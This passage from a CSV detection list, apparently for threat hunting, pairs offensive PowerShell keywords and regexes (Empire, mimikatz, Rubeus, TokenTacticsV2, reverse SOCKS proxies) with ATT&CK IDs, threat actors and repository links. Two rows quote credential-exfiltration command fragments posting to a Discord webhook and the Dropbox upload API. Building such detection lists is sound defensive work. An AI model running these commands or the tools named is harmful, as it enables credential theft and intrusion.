TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49436" "*Invoke-RefreshToSharePointToken *",".{0,1000}Invoke\-RefreshToSharePointToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - 
TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49437" "*Invoke-RefreshToSharePointToken*",".{0,1000}Invoke\-RefreshToSharePointToken.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49438" "*Invoke-RefreshToSubstrateToken *",".{0,1000}Invoke\-RefreshToSubstrateToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49439" "*Invoke-RefreshToToken *",".{0,1000}Invoke\-RefreshToToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49440" "*Invoke-RefreshToYammerToken *",".{0,1000}Invoke\-RefreshToYammerToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49441" 
"*Invoke-Reg1c1de*",".{0,1000}Invoke\-Reg1c1de.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49442" "*Invoke-RegistryAlwaysInstallElevatedCheck*",".{0,1000}Invoke\-RegistryAlwaysInstallElevatedCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49443" "*Invoke-RegistryAlwaysInstallElevatedCheck*",".{0,1000}Invoke\-RegistryAlwaysInstallElevatedCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49444" "*Invoke-RegistryAlwaysInstallElevatedCheck*",".{0,1000}Invoke\-RegistryAlwaysInstallElevatedCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49445" "*Invoke-RemoteMimikatz*",".{0,1000}Invoke\-RemoteMimikatz.{0,1000}","offensive_tool_keyword","mimikatz","PowerShell Scripts focused on Post-Exploitation 
Capabilities","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","N/A","10","4","318","86","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z","49446" "*Invoke-RemoteScriptWithOutput*",".{0,1000}Invoke\-RemoteScriptWithOutput.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","49447" "*Invoke-ResolverBackdoor*",".{0,1000}Invoke\-ResolverBackdoor.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49448" "*Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)*",".{0,1000}Invoke\-RestMethod\s\-ContentType\s\'Application\/Json\'\s\-Uri\s\$discord\s\-Method\sPost\s\-Body\s\(\$Body\s\|\sConvertTo\-Json\).{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","49449" "*Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile * -Headers *",".{0,1000}Invoke\-RestMethod\s\-Uri\shttps\:\/\/content\.dropboxapi\.com\/2\/files\/upload\s\-Method\sPost\s\s\-InFile\s.{0,1000}\s\s\-Headers\s.{0,1000}","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - 
T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","49450" "*Invoke-ReverseDNSLookup*",".{0,1000}Invoke\-ReverseDNSLookup.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49451" "*Invoke-ReverseDNSLookup.ps1*",".{0,1000}Invoke\-ReverseDNSLookup\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49452" "*Invoke-ReverseProxy*",".{0,1000}Invoke\-ReverseProxy.{0,1000}","offensive_tool_keyword","PowerProxy","PowerShell SOCKS proxy with reverse proxy capabilities","T1090.003 - T1059.001 - T1105","TA0011 - TA0005 - 
TA0008","N/A","Dispossessor","C2","https://github.com/get-get-get-get/PowerProxy","1","1","N/A","N/A","10","10","80","10","2021-04-23T16:51:28Z","2020-01-03T18:18:58Z","49453" "*Invoke-ReverseSocksProxy*",".{0,1000}Invoke\-ReverseSocksProxy.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","49454" "*Invoke-ReverseSocksProxy*",".{0,1000}Invoke\-ReverseSocksProxy.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","49455" "*Invoke-ReverseSocksProxy*",".{0,1000}Invoke\-ReverseSocksProxy.{0,1000}","offensive_tool_keyword","PowerProxy","PowerShell SOCKS proxy with reverse proxy capabilities","T1090.003 - T1059.001 - T1105","TA0011 - TA0005 - TA0008","N/A","Dispossessor","C2","https://github.com/get-get-get-get/PowerProxy","1","1","N/A","N/A","10","10","80","10","2021-04-23T16:51:28Z","2020-01-03T18:18:58Z","49456" "*invokereverttoself*",".{0,1000}invokereverttoself.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","49457" "*Invoke-RevertToSelf*",".{0,1000}Invoke\-RevertToSelf.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49458" "*Invoke-RevertToSelf*",".{0,1000}Invoke\-RevertToSelf.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 
- T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","49459" "*Invoke-RevertToSelf*",".{0,1000}Invoke\-RevertToSelf.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49460" 
"*Invoke-RevShellServer.ps1*",".{0,1000}Invoke\-RevShellServer\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49461" "*Invoke-RickASCII*",".{0,1000}Invoke\-RickASCII.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - 
CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49462" "*Invoke-RIDHijacking*",".{0,1000}Invoke\-RIDHijacking.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","49463" "*Invoke-RIDHijacking.ps1*",".{0,1000}Invoke\-RIDHijacking\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice 
Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49464" "*invoke-ridhijacking.py*",".{0,1000}invoke\-ridhijacking\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","49465" "*Invoke-Rubeus *",".{0,1000}Invoke\-Rubeus\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49466" "*Invoke-Rubeus createnetonly*",".{0,1000}Invoke\-Rubeus\screatenetonly.{0,1000}","offensive_tool_keyword","Invoke-s4u2self","A tool that abuses s4u2self to gain access to remote hosts","T1550.002 - T1557.001","TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-s4u2self","1","0","N/A","N/A","9","1","5","2","2025-02-13T16:27:51Z","2023-09-14T13:31:05Z","49467" "*Invoke-Rubeus s4u*",".{0,1000}Invoke\-Rubeus\ss4u.{0,1000}","offensive_tool_keyword","Invoke-s4u2self","A tool that abuses s4u2self to gain access to remote hosts","T1550.002 - T1557.001","TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-s4u2self","1","0","N/A","N/A","9","1","5","2","2025-02-13T16:27:51Z","2023-09-14T13:31:05Z","49468" 
"*Invoke-Rubeus*",".{0,1000}Invoke\-Rubeus.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49469" "*Invoke-Rubeus*",".{0,1000}Invoke\-Rubeus.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49470" "*Invoke-Rubeus*",".{0,1000}Invoke\-Rubeus.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49471" "*Invoke-RunAs.ps1*",".{0,1000}Invoke\-RunAs\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49472" "*Invoke-RunasCs 
-*",".{0,1000}Invoke\-RunasCs\s\-.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","49473" "*Invoke-RunasCs*",".{0,1000}Invoke\-RunasCs.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","49474" "*Invoke-RunasCs*",".{0,1000}Invoke\-RunasCs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","49475" "*Invoke-RunasCs*",".{0,1000}Invoke\-RunasCs.{0,1000}","offensive_tool_keyword","RunasCs","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","49476" 
